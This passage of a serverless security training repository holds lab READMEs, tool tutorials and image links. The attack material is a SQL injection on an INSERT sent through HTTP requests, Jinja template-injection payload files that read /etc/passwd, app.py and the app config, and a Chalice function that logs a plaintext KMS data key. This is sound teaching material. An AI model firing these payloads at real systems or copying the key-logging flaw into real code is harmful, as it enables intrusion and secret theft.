https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Serverless/None-Signed-Token/img/get_token.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/get_token.png


--------------------------------------------------------------------------------
/Serverless/None-Signed-Token/img/local-storage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/local-storage.png


--------------------------------------------------------------------------------
/Serverless/None-Signed-Token/img/login-page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/login-page.png


--------------------------------------------------------------------------------
/Serverless/None-Signed-Token/img/open-browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/open-browser.png


--------------------------------------------------------------------------------
/Serverless/None-Signed-Token/img/tamper-jwt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/tamper-jwt.png


--------------------------------------------------------------------------------
/Serverless/Npm-Audit/README.md:
--------------------------------------------------------------------------------
 1 | # **`NPM-Audit - NodeJS Source-Code-Analysis-Tool`**
 2 | 
 3 | 
 4 | Step 1: Navigate to the directory(`~/Cut-The-Funds-NodeJS`) that has the source code to be scanned.
 5 | 
 6 | ![](img/npm-audit-1.png)
 7 | 
 8 | 
 9 | Step 2: Run `npm audit --json >> npm_audit.json` to scan and generate a json report. The report generated can be read.
10 | 
11 | ![](img/npm-audit-2.png)
12 | 


--------------------------------------------------------------------------------
/Serverless/Npm-Audit/img/npm-audit-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Npm-Audit/img/npm-audit-1.png


--------------------------------------------------------------------------------
/Serverless/Npm-Audit/img/npm-audit-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Npm-Audit/img/npm-audit-2.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/local-storage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/local-storage.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/login-page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/login-page.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/network.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/network.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/open-browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/open-browser.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/param.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/param.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/search-default-view.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/search-default-view.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/search-icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/search-icon.png


--------------------------------------------------------------------------------
/Serverless/Permission-Flaw/img/search-values.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/search-values.png


--------------------------------------------------------------------------------
/Serverless/README.md:
--------------------------------------------------------------------------------
 1 | # [Serverless](README.md)
 2 | 
 3 | ### Initial Setup
 4 | 
 5 | * Update the Labs
 6 | 
 7 | ```bash
 8 | cd container_training/Serverless/Initial-Setup/
 9 | 
10 | ./install_script.sh
11 | ```
12 | 
13 | 
14 | ##### Function Data Event Injection
15 | 
16 | * [Event-Injection-S3](Event-Injection-S3/README.md)
17 | 
18 | * [Server Side Template Injection](Server-Side-Template-Injection/README.md)
19 | 
20 | 
21 | ##### Broken Access Control
22 | 
23 | * [None Signed Token](None-Signed-Token/README.md)
24 | 
25 | * [Algorithm Confusion](Algorithm-Confusion/README.md)
26 | 
27 | * [Non Unique Value](Non-Unique-Value/README.md)
28 | 
29 | 
30 | ##### IAM Function Privilege Management
31 | 
32 | * [Permission Flaw](Permission-Flaw/README.md)
33 | 
34 | 
35 | #### Static Application Security Testing
36 | 
37 | * [Bandit](Bandit/README.md)
38 | 
39 | * [NodeJsScan](NodeJsScan/README.md)
40 | 
41 | 
42 | ##### Source Composition Analysis
43 | 
44 | * [NPM AUDIT](Npm-Audit/README.md)
45 | 
46 | * [Safety](Safety/README.md)
47 | 
48 | 
49 | ##### CTF
50 | 


--------------------------------------------------------------------------------
/Serverless/SQL Injection - FaaS/README.md:
--------------------------------------------------------------------------------
 1 | ## SQL Injection - Event Injection
 2 | 
 3 | This is a slightly unconventional SQL Injection attack, in that, its triggered on an INSERT statement.
 4 | 
 5 | The SQLi can be triggered by tampering with the "reading" from the "sensor", you can trigger a SQL Injection attack on the INSERT Statement.
 6 | 
 7 | You can leverage mysql functions, global variables, etc for the attack
 8 | 
 9 | * Run `http GET https://f20ymqtwal.execute-api.us-east-1.amazonaws.com/api/test_insert`
10 | * Run `http POST https://f20ymqtwal.execute-api.us-east-1.amazonaws.com/api/publish/testesh reading="(SELECT DATABASE())"`
11 | 
12 | Substitute `(SELECT DATABASE())` with `(SELECT @@datadir), (SELECT user()), (SELECT CURRENT_USER())`
13 | 
14 | * Run `cd /root/DVFaaS-Damn-Vulnerable-Functions-as-a-Service/injection/mqtt_rds_sql_event_injection`
15 | * Run `cat app.py`
16 | 
17 | Let's look at the code


--------------------------------------------------------------------------------
/Serverless/Safety/README.md:
--------------------------------------------------------------------------------
 1 | # **`Safety - Python Source-Code-Analysis-Tool`**
 2 | 
 3 | 
 4 | Step 1: Navigate to the directory(`~/serverless-training-apps`) that has the python virtual-environment.
 5 | 
 6 | ```bash
 7 | cd ~/serverless-training-apps
 8 | ```
 9 | 
10 | 
11 | Step 2: Create and activate python-virtual environment by running `source venv/bin/activate`
12 | 
13 | ```bash
14 | virtualenv venv
15 | 
16 | source venv/bin/activate
17 | ```
18 | 
19 | 
20 | Step 3: Install the necessary requirements
21 | 
22 | ```bash
23 | pip install -r ~/serverless-training-apps/cv_uploader/cv-upload-handler/requirements.txt
24 | ```
25 | 
26 | 
27 | Step 4: Run a scan on installed python libraries by running `safety check --json`
28 | 
29 | ![](img/safety-4.png)
30 | 
31 | 


--------------------------------------------------------------------------------
/Serverless/Safety/img/safety-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Safety/img/safety-1.png


--------------------------------------------------------------------------------
/Serverless/Safety/img/safety-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Safety/img/safety-2.png


--------------------------------------------------------------------------------
/Serverless/Safety/img/safety-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Safety/img/safety-3.png


--------------------------------------------------------------------------------
/Serverless/Safety/img/safety-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Safety/img/safety-4.png


--------------------------------------------------------------------------------
/Serverless/Secrets-Management/README.md:
--------------------------------------------------------------------------------
 1 | ## Serverless - Secrets Management
 2 | 
 3 | ### Instructions
 4 | 
 5 | > By now, please make sure you have AWS creds configured
 6 | 
 7 | 
 8 | * Install pip3
 9 | 
10 | ```bash
11 | wget https://bootstrap.pypa.io/get-pip.py && python3 get-pip.py && rm get-pip.py
12 | ```
13 | 
14 | * Install Terraform:
15 | 
16 | ```
17 | wget https://releases.hashicorp.com/terraform/0.11.13/terraform_0.11.13_linux_amd64.zip &&
18 | unzip terraform_0.11.13_linux_amd64.zip &&
19 | mv terraform /usr/local/bin/ &&
20 | rm terraform_0.11.13_linux_amd64.zip &&
21 | terraform --version
22 | ```
23 | 
24 | * Install Dependencies
25 |     * `cd /root/container_training/Serverless/Secrets-Management/ops`
26 | 
27 |     * `terraform init`
28 |     * `terraform apply`
29 | 
30 | * You need to select `us-west-2` when terraform prompts. Other regions are ok to. Please use a valid region.
31 | * If terraform has run successfully, it generates a `config.json`
32 | * Now, run: `cd container_training/Serverless/Secrets-Management/training-secrets`
33 | * run: `mkdir -p .chalice`
34 | * run `cp ../ops/config.json .chalice/`
35 | * Run `pip3 install chalice`
36 | * Run `pip3 install -r requirements.txt`
37 | * Run `chalice deploy`. This deploys the serverless function and generates the URL
38 | * Test url with `http POST https://<api-generated-url>/api/create-user email=<some-email>`
39 | 
40 | 
41 | 


--------------------------------------------------------------------------------
/Serverless/Secrets-Management/ops/config.json.tpl:
--------------------------------------------------------------------------------
 1 | {
 2 |   "version": "2.0",
 3 |   "app_name": "training-secrets",
 4 |   "stages": {
 5 |     "dev": {
 6 |       "api_gateway_stage": "api",
 7 |       "manage_iam_role": false,
 8 |       "iam_role_arn": "${ROLE_NAME}",
 9 |       "environment_variables": {
10 |         "DB_TABLE": "${DB_TABLE}",
11 |         "KEY_ID": "${KEY_ID}"
12 |       }
13 |     }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Serverless/Secrets-Management/training-secrets/.gitignore:
--------------------------------------------------------------------------------
1 | .chalice/deployments/
2 | .chalice/venv/
3 | 


--------------------------------------------------------------------------------
/Serverless/Secrets-Management/training-secrets/app.py:
--------------------------------------------------------------------------------
 1 | from chalice import Chalice
 2 | import boto3
 3 | from os import environ
 4 | from uuid import uuid4
 5 | from os import urandom
 6 | import base64
 7 | 
 8 | ssm = boto3.client('ssm', region_name='us-west-2')
 9 | client = boto3.client('kms')
10 | dynamo = boto3.resource('dynamodb')
11 | 
12 | db = environ.get('DB_TABLE')
13 | kms_cmk = environ.get('KEY_ID')
14 | jwt_pwd = ssm.get_parameter(Name = 'we45-training-jwt-pass', WithDecryption = True)['Parameter']['Value']
15 | 
16 | pad = lambda s: s + (32 - len(s) % 32) * b' '
17 | app = Chalice(app_name='training-secrets')
18 | 
19 | 
20 | def gen_key_seed():
21 |     data_key = client.generate_data_key(
22 |         KeyId=kms_cmk,
23 |         KeySpec="AES_256",
24 |     )
25 |     ciphertext_blob = base64.b64encode(data_key.get('CiphertextBlob')).decode()
26 |     plaintext_key = data_key.get('Plaintext')
27 |     print("Plaintext key: {}".format(plaintext_key))
28 |     return ciphertext_blob
29 | 
30 | 
31 | @app.route('/create-user',methods = ['POST'], content_types=['application/json'], cors = True)
32 | def create_user():
33 |     jbody = app.current_request.json_body
34 |     if isinstance(jbody, dict):
35 |         if 'email' in jbody:
36 |             table = dynamo.Table(db)
37 |             key = gen_key_seed()
38 |             table.put_item(
39 |                 Item={
40 |                     'email': jbody['email'],
41 |                     'key': key
42 |                 }
43 |             )
44 |             return {"success": "created user: {}".format(jbody['email'])}
45 | 


--------------------------------------------------------------------------------
/Serverless/Secrets-Management/training-secrets/requirements.txt:
--------------------------------------------------------------------------------
1 | boto3==1.9.120
2 | 


--------------------------------------------------------------------------------
/Serverless/Server-Side-Template-Injection/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Server-Side-Template-Injection/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Serverless/Serverless-Attack/malicious-file.txt:
--------------------------------------------------------------------------------
1 | {{ config.items() }}
2 | 


--------------------------------------------------------------------------------
/Serverless/Serverless-Attack/read-etc-pwd.txt:
--------------------------------------------------------------------------------
1 | {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
2 | 


--------------------------------------------------------------------------------
/Serverless/Serverless-Attack/read-py-files.txt:
--------------------------------------------------------------------------------
1 | {{ ''.__class__.__mro__[2].__subclasses__()[40]('app.py').read() }}
2 | 


--------------------------------------------------------------------------------
/Serverless/Serverless-Attack/readme.txt:
--------------------------------------------------------------------------------
1 | Trying Serverless Attack Lab!!!
2 | 


--------------------------------------------------------------------------------
/Serverless/insecure-deployment/.arc:
--------------------------------------------------------------------------------
1 | @app
2 | testapp
3 | 
4 | @http
5 | get /


--------------------------------------------------------------------------------
/Serverless/insecure-deployment/README.md:
--------------------------------------------------------------------------------
 1 | ## Insecure Deployment - IAM Privileges
 2 | 
 3 | 
 4 | * Run: `cd container_training/Serverless/insecure-deployment`
 5 | 
 6 | * Run `npm install`
 7 | 
 8 | * Run: `pip install awscli` if `aws-cli` is not installed already
 9 | 
10 | * Run: `aws configure` and configure the aws creds Access key ID and Secret (if not done already)
11 | 
12 | * Run `npx deploy`
13 | 
14 | * Now login to your AWS Console and examine the AWS Lambda deployment for this function
15 | 


--------------------------------------------------------------------------------
/Serverless/insecure-deployment/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "insecure-deployment",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "keywords": [],
10 |   "author": "",
11 |   "license": "ISC",
12 |   "dependencies": {
13 |     "@architect/architect": "^5.5.10"
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Serverless/insecure-deployment/src/http/get-index/index.js:
--------------------------------------------------------------------------------
 1 | // @architect/functions enables secure sessions, express-style middleware and more
 2 | // let arc = require('@architect/functions')
 3 | // let url = arc.http.helpers.url
 4 | 
 5 | exports.handler = async function http(req) {
 6 |   console.log(req)
 7 |   return {
 8 |     type: 'text/html; charset=utf8',
 9 |     body: '<h1>Hello world!</h1>'
10 |   }
11 | }
12 | 
13 | // Example responses
14 | 
15 | /* Forward requester to a new path
16 | exports.handler = async function http(request) {
17 |   if (process.env.NODE_ENV !== 'production') {
18 |     console.log(request)
19 |   }
20 |   return {
21 |     status: 302,
22 |     location: '/staging/about',
23 |   }
24 | }
25 | */
26 | 
27 | /* Successful resource creation, CORS enabled
28 | exports.handler = async function http(request) {
29 |   return {
30 |     status: 201,
31 |     type: 'application/json',
32 |     body: JSON.stringify({ok: true}),
33 |     cors: true,
34 |   }
35 | }
36 | */
37 | 
38 | /* Deliver client-side JS
39 | exports.handler = async function http(request) {
40 |   return {
41 |     type: 'text/javascript',
42 |     body: 'console.log("Hello world!")',
43 |   }
44 | }
45 | */
46 | 
47 | // Learn more: https://arc.codes/guides/http
48 | 


--------------------------------------------------------------------------------
/Serverless/insecure-deployment/src/http/get-index/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "testapp-get-index",
3 |   "dependencies": {
4 |     "@architect/data": "^2.0.14",
5 |     "@architect/functions": "^2.0.15"
6 |   }
7 | }
8 | 


--------------------------------------------------------------------------------
/img/github.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/img/github.png


--------------------------------------------------------------------------------
/img/twitter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/img/twitter.png


--------------------------------------------------------------------------------
/img/we45logo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/img/we45logo.jpg


--------------------------------------------------------------------------------